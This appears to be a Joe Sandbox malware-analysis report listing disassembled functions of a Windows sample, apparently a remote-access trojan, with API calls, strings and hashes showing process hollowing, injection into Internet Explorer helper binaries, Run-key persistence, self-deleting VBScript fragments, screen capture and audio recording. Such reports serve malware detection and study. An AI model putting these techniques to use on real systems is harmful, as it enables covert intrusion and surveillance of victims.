DeleteObject.GDI32(?), ref: 00417001
DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
DeleteDC.GDI32(?), ref: 0041713C
DeleteDC.GDI32(00000000), ref: 0041713F
DeleteObject.GDI32(00000000), ref: 00417142
GlobalFree.KERNEL32(?), ref: 0041714D
DeleteObject.GDI32(00000000), ref: 00417201
GlobalFree.KERNEL32(?), ref: 00417208
DeleteDC.GDI32(?), ref: 00417218
DeleteDC.GDI32(00000000), ref: 00417223

Strings

DISPLAY, xrefs: 00416E91

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 4256916514-865373369
Opcode ID: 1c8eb6970acb32d37b323b2389c2378745184ce0039c4fbe48c904cadf28dbca
Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
Opcode Fuzzy Hash: 1c8eb6970acb32d37b323b2389c2378745184ce0039c4fbe48c904cadf28dbca
Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A

Function 0041642D Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
GetProcAddress.KERNEL32(00000000), ref: 00416477
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
GetProcAddress.KERNEL32(00000000), ref: 0041648B
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
GetProcAddress.KERNEL32(00000000), ref: 0041649F
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
GetProcAddress.KERNEL32(00000000), ref: 004164B3
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
GetThreadContext.KERNEL32(?,00000000), ref: 00416583
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
SetThreadContext.KERNEL32(?,00000000), ref: 00416766
ResumeThread.KERNEL32(?), ref: 00416773
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
GetCurrentProcess.KERNEL32(?), ref: 00416795
TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
GetLastError.KERNEL32 ref: 004167B8

Strings

ZwClose, xrefs: 004164A1
ZwMapViewOfSection, xrefs: 00416479
ZwUnmapViewOfSection, xrefs: 0041648D
ZwCreateSection, xrefs: 0041645A
ntdll, xrefs: 0041645F, 0041647E, 00416492, 004164A6

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: 2be8fea86c719762713c8bf7b548c83654da6953c44db828118e2ba3fc6e7782
Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
Opcode Fuzzy Hash: 2be8fea86c719762713c8bf7b548c83654da6953c44db828118e2ba3fc6e7782
Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A

Function 0040BFDE Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 281registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132

Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,h5S,0040BC76,?,00472200,pth_unenc,h5S), ref: 0040A801
Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(00000000), ref: 0040A811
Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,h5S), ref: 0040A823

Part of subcall function 0041A17B: CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
ExitProcess.KERNEL32 ref: 0040C389

Strings

@8T, xrefs: 0040C088
fso.DeleteFile ", xrefs: 0040C1F3
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C2BA
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C32C
while fso.FileExists(", xrefs: 0040C1A5
open, xrefs: 0040C377
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C163
""", 0, xrefs: 0040C2A0
t<F, xrefs: 0040C2F0, 0040C331
\update.vbs, xrefs: 0040C134
On Error Resume Next, xrefs: 0040C172
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040C02A
exepath, xrefs: 0040C0B0
fso.DeleteFolder ", xrefs: 0040C264
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040C07B
wend, xrefs: 0040C242
"), xrefs: 0040C18E
Temp, xrefs: 0040C139

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$@8T$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
API String ID: 1861856835-1753771730
Opcode ID: 5700fb6a6c6df866ef9bb35c697a8cdfed5b8cd8b6a8b4940738935c0824547e
Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
Opcode Fuzzy Hash: 5700fb6a6c6df866ef9bb35c697a8cdfed5b8cd8b6a8b4940738935c0824547e
Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E

Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
ExitProcess.KERNEL32(00000000), ref: 00410F05
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
CloseHandle.KERNEL32(00000000), ref: 00410FA0
GetCurrentProcessId.KERNEL32 ref: 00410FA6
PathFileExistsW.SHLWAPI(?), ref: 00410FD7
GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
lstrcatW.KERNEL32(?,.exe), ref: 00411066

Part of subcall function 0041A17B: CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
Sleep.KERNEL32(000001F4), ref: 004110E7
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
CloseHandle.KERNEL32(00000000), ref: 0041110E
GetCurrentProcessId.KERNEL32 ref: 00411114

Strings

@8T, xrefs: 00410F0B
WDH, xrefs: 00410FAD, 0041111B
exepath, xrefs: 00410F31
temp_, xrefs: 00411048
(#G, xrefs: 00410EE8
open, xrefs: 004110A0
.exe, xrefs: 0041105A

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: (#G$.exe$@8T$WDH$exepath$open$temp_
API String ID: 2649220323-2455933176
Opcode ID: 50f250ee1fb3edbabcea8393b70c4c82cfc6626be3e876d8b0d3f837c34a7c0b
Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
Opcode Fuzzy Hash: 50f250ee1fb3edbabcea8393b70c4c82cfc6626be3e876d8b0d3f837c34a7c0b
Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D

Function 0040BC59 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 259registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,h5S), ref: 0040BD63
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,h5S), ref: 0040BDA6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,h5S), ref: 0040BDB5

Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,h5S,0040BC76,?,00472200,pth_unenc,h5S), ref: 0040A801
Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(00000000), ref: 0040A811
Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,h5S), ref: 0040A823

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
ExitProcess.KERNEL32 ref: 0040BFD7

Strings

h5S, xrefs: 0040BC5F
@8T, xrefs: 0040BD1C
.vbs, xrefs: 0040BDBF
fso.DeleteFile ", xrefs: 0040BED3
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040BF7F
while fso.FileExists(", xrefs: 0040BE86
open, xrefs: 0040BFCA
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040BE43
On Error Resume Next, xrefs: 0040BE52
pth_unenc, xrefs: 0040BC60
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040BCA5
exepath, xrefs: 0040BD3F
fso.DeleteFolder ", xrefs: 0040BF48
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040BCF6
wend, xrefs: 0040BF22
"), xrefs: 0040BE6F
Temp, xrefs: 0040BE04

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$@8T$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$h5S$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2020175638
Opcode ID: ed0e6813112b3f903b803d7c7a325247744f1b06bd687a2372c2727e3196b999
Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
Opcode Fuzzy Hash: ed0e6813112b3f903b803d7c7a325247744f1b06bd687a2372c2727e3196b999
Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E

Function 00418FFD Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
SetEvent.KERNEL32 ref: 004191CF
WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
CloseHandle.KERNEL32 ref: 004191F0
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C

Strings

resume audio, xrefs: 00419198
P0F, xrefs: 0041910B
close audio, xrefs: 00419217
stop audio, xrefs: 0041920D
alias audio, xrefs: 0041906E
status audio mode, xrefs: 004191AD
stopped, xrefs: 004191B8
play audio, xrefs: 00419101
pause audio, xrefs: 00419180
open ", xrefs: 00419086
" type , xrefs: 0041908B

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $P0F$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-3254062235
Opcode ID: a60c70357fcbf080cedcbd66e2a2348aaac85c1228117943fca9f2eced453a8a
Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
Opcode Fuzzy Hash: a60c70357fcbf080cedcbd66e2a2348aaac85c1228117943fca9f2eced453a8a
Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E

Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7

Strings

fmt , xrefs: 00401B0D
data, xrefs: 00401B91
WAVE, xrefs: 00401AFD
RIFF, xrefs: 00401ADD

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3

Function 0044C60D Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044C69F
_free.LIBCMT ref: 0044C6C5
_free.LIBCMT ref: 0044C6EE
_free.LIBCMT ref: 0044C726
_free.LIBCMT ref: 0044C757
_free.LIBCMT ref: 0044C798
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044C819
_free.LIBCMT ref: 0044C832
_wcschr.LIBVCRUNTIME ref: 0044C86F
_free.LIBCMT ref: 0044C8DB
_free.LIBCMT ref: 0044C901
_free.LIBCMT ref: 0044C92A
_free.LIBCMT ref: 0044C95F
_free.LIBCMT ref: 0044C990
_free.LIBCMT ref: 0044C9D1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044CA56
_free.LIBCMT ref: 0044CA6F

Strings

@!S, xrefs: 0044C67F, 0044C6D7, 0044C6E9, 0044C6F6, 0044C881, 0044C8A7, 0044C911, 0044C925, 0044C932, 0044C9F0

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID: @!S
API String ID: 3899193279-4045816191
Opcode ID: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
Opcode Fuzzy Hash: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D

Function 0040DE34 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 223processsynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,@8T,00471FFC,?,00000001), ref: 0040DE4E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23

Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133

Strings

h5S, xrefs: 0040E061
@8T, xrefs: 0040DE44
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040E0A2
Inj, xrefs: 0040E14F
ieinstal.exe, xrefs: 0040E0B9
Attempt-S4A0CI, xrefs: 0040E02D
ielowutil.exe, xrefs: 0040E0FA

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
String ID: @8T$Attempt-S4A0CI$C:\Program Files(x86)\Internet Explorer\$Inj$h5S$ieinstal.exe$ielowutil.exe
API String ID: 193334293-2194314230
Opcode ID: d41619a0dc84c459f3e5139e4e701e8aeaf64f0acb62bb960b5741da55aeeb18
Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
Opcode Fuzzy Hash: d41619a0dc84c459f3e5139e4e701e8aeaf64f0acb62bb960b5741da55aeeb18
Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A

Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0044E4EA

Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7

_free.LIBCMT ref: 0044E4DF

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044E501
_free.LIBCMT ref: 0044E516
_free.LIBCMT ref: 0044E521
_free.LIBCMT ref: 0044E543
_free.LIBCMT ref: 0044E556
_free.LIBCMT ref: 0044E564
_free.LIBCMT ref: 0044E56F
_free.LIBCMT ref: 0044E5A7
_free.LIBCMT ref: 0044E5AE
_free.LIBCMT ref: 0044E5CB
_free.LIBCMT ref: 0044E5E3

Strings

xF, xrefs: 0044E4BC

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: xF
API String ID: 161543041-2169143296
